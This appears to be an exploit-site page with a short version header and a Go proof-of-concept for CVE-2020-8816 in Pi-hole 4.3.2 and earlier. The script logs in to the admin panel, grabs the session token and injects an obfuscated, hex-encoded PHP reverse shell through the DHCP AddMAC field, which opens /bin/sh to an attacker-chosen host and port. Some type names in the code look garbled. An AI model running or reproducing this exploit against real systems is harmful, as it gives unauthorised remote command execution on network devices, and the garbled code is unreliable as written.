PWNWIK.COM
,
影响版本
Pi-hole <= 4.3.2
POC
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://target/admin/
package main
import (
"flag"
"log"
"strings"
"github.com/anaskhan96/soup"
"encoding/hex"
"github.com/levigross/grequests"
)
type Options struct {
url, password, host, port string
}
var HOST string
var URL string
var PORT string
var PASSWD string
func generate_shell() string{
payload := "php -r '$sock=fsockopen(\"HOST\", PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
payload = strings.Replace(payload, "HOST", HOST, 1)
payload = strings.Replace(payload, "PORT", PORT, 1)
return hex.EncodeToString(byte(payload))
}
func extractFlags() *Options {
urlPtr := flag.String("u", "http://10.0.0.1/admin/", "Set the Url of the admin panel")
passPtr := flag.String("pass", "admin", "Admin Password")
hostPtr := flag.String("host", "10.0.0.1", "Set the host for the reverse shell")
portPtr := flag.String("p", "1337", "Set Port for the reverse shell")
flag.Parse()
return &Options{*urlPtr, *passPtr, *hostPtr,*portPtr}
}
func doLogin(ses *grequests.Session) *grequests.Session{
log.Println("Logging In...")
resp, err := ses.Post(URL+"index.php",&grequests.RequestOptions{Data: mapstringstring{"pw": PASSWD}})
if err != nil {
log.Fatal("Error logging-in: ", err)
}
if resp.Ok != true {
log.Println("Request for log-in did not return OK")
}
log.Println("Logged In!")
return ses
}
func getToken(ses *grequests.Session) string{
resp, err:= ses.Get(URL+"index.php",nil)
if err != nil {
log.Fatal("Error getting token: ", err)
}
if resp.Ok != true {
log.Println("Request for getting token did not return OK")
}
html := soup.HTMLParse(resp.String())
token := html.Find("div","id","token").Text()
return token
}
func Exploit(ses *grequests.Session, token string, payload string) {
full_payload := "aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN(\"" + payload + "\"));'&&"
resp,err := ses.Post(URL + "settings.php", &grequests.RequestOptions{Data: mapstringstring{
"AddMAC":full_payload,
"field":"DHCP",
"AddIP":"10.10.10.10",
"AddHostname":"10.10.10.10",
"addstatic":"",
"token":token}})
if err != nil {
log.Fatal("Error sending payload: ", err)
}
if resp.Ok != true {
log.Println("Request for sending payload did not return OK")
}
}
func main(){
options := extractFlags()
HOST = options.host
URL = options.url
PORT = options.port
PASSWD = options.password
session := grequests.NewSession(nil)
doLogin(session)
log.Println("Getting Token...")
token := getToken(session)
log.Println("Token:",token)
log.Println("Generating payload...")
payload := generate_shell()
log.Println("Payload generated:",payload)
log.Println("Sending exploit...")
Exploit(session, token, payload)
log.Println("Exploit executed, check your session")
}
PWNWIK.COM
